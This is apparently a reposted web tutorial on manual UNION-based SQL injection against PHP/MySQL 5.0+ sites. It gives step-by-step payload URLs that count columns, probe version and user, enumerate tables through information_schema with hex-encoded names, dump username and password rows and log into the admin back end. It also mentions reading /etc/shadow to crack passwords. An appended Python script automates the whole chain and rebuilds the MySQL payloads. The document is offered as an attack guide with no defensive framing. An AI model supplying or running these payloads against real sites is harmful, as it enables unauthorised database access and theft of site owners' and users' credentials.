Php-mysql 5.0 and above manual injection practices

Source: Internet
Author: User

PHP injection tools are not very convenient at the moment (Pangolin throws errors all the time), so I decided to write up an example of manual PHP injection. The exact statements and approach differ with the conditions you meet. After the number of columns has been determined, the first thing to find out is the connecting user's information. During the injection, if the current database connection user is root or has root-level privileges, you can try load_file() to read files (load_file() needs the FILE privilege). On Linux we can read /etc/passwd and /etc/shadow and brute-force the Linux passwords; on Windows we can read ordinary and sensitive files such as the Serv-U configuration file or MySQL's my.ini, and then crack the tables and fields one by one. In the second case, if version() shows that MySQL is 5.0 or later, we can use the information_schema database that ships with MySQL to enumerate all the tables, then crack the fields one by one. The worst case (rare nowadays) is a non-root user on a database older than 5.0: every table and field has to be guessed by hand, which without tools multiplies the work dozens of times and may never succeed. Below I walk through the mainstream case, MySQL 5.0 and later, using information_schema to enumerate all tables during manual injection.

1. Scan with the Ah D injection tool and find an injection point: http://xxxx.com/x.php?Id=x

2. Determine the number of columns:
http://xxx.com/x.php?Id=x order by 4
http://xxx.com/x.php?Id=x order by 5
order by 4 returns the normal page and order by 5 returns an error page.

So the query has 4 columns. Error display is turned off on this site, so error messages do not reveal the physical path of the web root. 3. Look at basic information. A few functions are generally used: version() gives the MySQL version, database() the current database, and user() the current connecting user. First find which columns are echoed onto the page:
http://xxx.com/x.php?Id=x%20and%201=2%20union%20select%201,2,3,4

http://xxx.com/x.php?Id=x%20and%201=2%20union%20select%201,version(),database(),4

http://www.bkjia.com/x.php?Id=x%20and%201=2%20union%20select%201,user(),3,4

From this we can see: user(): a0725135851@ww. database(): a0725135851 version(): 5.1.39-community (MySQL >= 4.0 supports UNION queries; MySQL >= 5.0 supports querying the information_schema tables). 4. Dump the table names: http://www.myhack58.com/x.php?Id=x+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+where+table_schema=0x6130373235313335383531+limit+0,1 (0x6130373235313335383531 is the hex encoding of the database name a0725135851; MySQL accepts a 0x literal wherever a quoted string would go, so the payload needs no quote characters).

The second table dumped is member. We appended limit 0,1 to the statement: that shows the first row. If the first table is not the administrator table, we change it to limit 1,1, and so on. A total of 15 tables were stepped through this way. That process is tedious, so here is a simpler method that dumps all the tables at once: http://xxx.com/x.php?Id=x+and+1=2+union+select+1,2,concat(0x7B317D,group_concat(distinct+table_name),0x7B317D),4+from+information_schema.columns+where+table_schema=0x6130373235313335383531 (0x7B317D is "{1}", a marker that makes the result easy to spot in the page).

This shows 12 tables at once, but the list may be incomplete, because group_concat output is truncated at group_concat_max_len (1024 bytes by default). In general, dump all the tables first; if none of them is an administrator table, fall back to the first method and step through them one by one.

5. Among the 15 tables, the one most likely to hold the administrator accounts is username. Dump its columns: http://xxx.com/x.php?Id=x+and+1=2+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x757365726E616D65 (0x757365726E616D65 is the hex encoding of "username").

The columns of the username table are then displayed. 6. Dump the column contents: http://xxx.com/x.php?Id=x and 1=2 union select 1,2,group_concat(username,0x5e,psw),4 from username (0x5e, "^", serves as the separator between the two fields here; 0x23, "#", works just as well).
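The whole procedure from step 2 through step 6, as an added Python example that is not part of the original tutorial: a constructed SQLite-backed stand-in for the vulnerable x.php (the table names, rows and passwords are made up), helpers that probe the column count with ORDER BY, find the echoed columns, build the UNION payloads, hex-encode string literals the way the tutorial does for table_schema and table_name, and parse the {1}...{1} marked group_concat output back into username/password pairs. SQLite has no information_schema and no 0x string literals, so the live demo uses SQLite string syntax, while mysql_payloads() reproduces the exact MySQL 5.x payload strings used above.

```python
import re
import sqlite3


# Constructed stand-in for the vulnerable x.php: the id parameter is pasted
# straight into the SQL string, like a PHP "select ... where id=$id".
# SQLite replaces MySQL (no information_schema, no 0x... string literals),
# so the ORDER BY / UNION / group_concat mechanics are what get exercised.
# Table names, rows and passwords are made up for this example.
def make_vulnerable_site():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES (1, 'hello', 'world', 'editor');
        CREATE TABLE username(id INTEGER, username TEXT, psw TEXT);
        INSERT INTO username VALUES (1, 'admin', 'pass1');
        INSERT INTO username VALUES (2, 'guest', 'pass2');
    """)

    def page(id_param):
        """Render the page for ?id=<id_param>; None means a SQL error
        (error display is off, so the attacker only sees a broken page)."""
        try:
            rows = con.execute(
                "SELECT id, title, body, author FROM news WHERE id=" + id_param
            ).fetchall()
        except sqlite3.Error:
            return None
        return "\n".join(" | ".join(str(c) for c in r) for r in rows)

    return page


def hex_literal(s):
    """MySQL accepts 0x6130... wherever a quoted string would go, which is why
    the tutorial writes table_schema=0x... instead of 'a0725135851'."""
    return "0x" + s.encode().hex().upper()


def find_column_count(page, good_id="1", max_cols=20):
    """Step 2: ORDER BY n succeeds while n <= column count and errors past it."""
    for n in range(1, max_cols + 1):
        if page("%s order by %d" % (good_id, n)) is None:
            return n - 1
    raise RuntimeError("more than %d columns?" % max_cols)


def union_payload(good_id, ncols, echo_col, expr, tail=""):
    """Steps 3-6: 'and 1=2' empties the real result so only the UNION row is
    rendered; expr is placed in the column that the page echoes back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo_col - 1] = expr
    return "%s and 1=2 union select %s%s" % (good_id, ",".join(cols), tail)


def find_echo_columns(page, good_id, ncols):
    """Step 3: union select 1,2,3,4 and see which numbers appear on the page."""
    probe = ",".join(str(i) for i in range(1, ncols + 1))
    body = page("%s and 1=2 union select %s" % (good_id, probe)) or ""
    cells = re.split(r"\s*\|\s*|\n", body)
    return [i for i in range(1, ncols + 1) if str(i) in cells]


def mysql_payloads(good_id, ncols, echo_col, schema, table):
    """The tutorial's MySQL 5.x payloads (steps 4-6) rebuilt from the helpers.
    0x7B317D ('{1}') brackets the group_concat output so it can be found in a
    cluttered page; 0x5e ('^') separates user name from password."""
    return {
        "tables": union_payload(good_id, ncols, echo_col,
            "concat(0x7B317D,group_concat(distinct table_name),0x7B317D)",
            " from information_schema.columns where table_schema=" + hex_literal(schema)),
        "columns": union_payload(good_id, ncols, echo_col,
            "group_concat(column_name)",
            " from information_schema.columns where table_name=" + hex_literal(table)),
        "rows": union_payload(good_id, ncols, echo_col,
            "group_concat(username,0x5e,psw)", " from " + table),
    }


def extract_marked(body, marker="{1}"):
    """Pull the text between the two markers out of the rendered page."""
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body or "", re.S)
    return m.group(1) if m else None


def split_pairs(blob, sep="^"):
    """group_concat joins rows with ',' and the tutorial joins fields with sep."""
    return [tuple(item.split(sep, 1)) for item in blob.split(",") if sep in item]


def run_demo():
    """End to end against the SQLite stand-in (SQLite string syntax, same idea)."""
    page = make_vulnerable_site()
    ncols = find_column_count(page)
    echo = find_echo_columns(page, "1", ncols)
    marker = "{1}"
    expr = "'%s' || group_concat(username || '^' || psw) || '%s'" % (marker, marker)
    body = page(union_payload("1", ncols, echo[0], expr, " from username"))
    creds = split_pairs(extract_marked(body, marker))
    return ncols, echo, creds


if __name__ == "__main__":
    print(run_demo())
    print(mysql_payloads("x", 4, 3, "a0725135851", "username")["tables"])
```

The {1} markers matter more than they look: on a real page the group_concat string lands somewhere inside HTML, and extract_marked() is what lets a script (or your eye) find it. Remember that what comes back is at most group_concat_max_len bytes, so a missing table in the list is not proof it does not exist.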

Log in to the back end with those credentials. Summary: most of the PHP manual injection write-ups I can find online cover the first and third methods described above. In practice those conditions (a very old MySQL version, or root database privileges) are not always present, so those methods cannot always be reused. This tutorial is a supplement on using the second method.
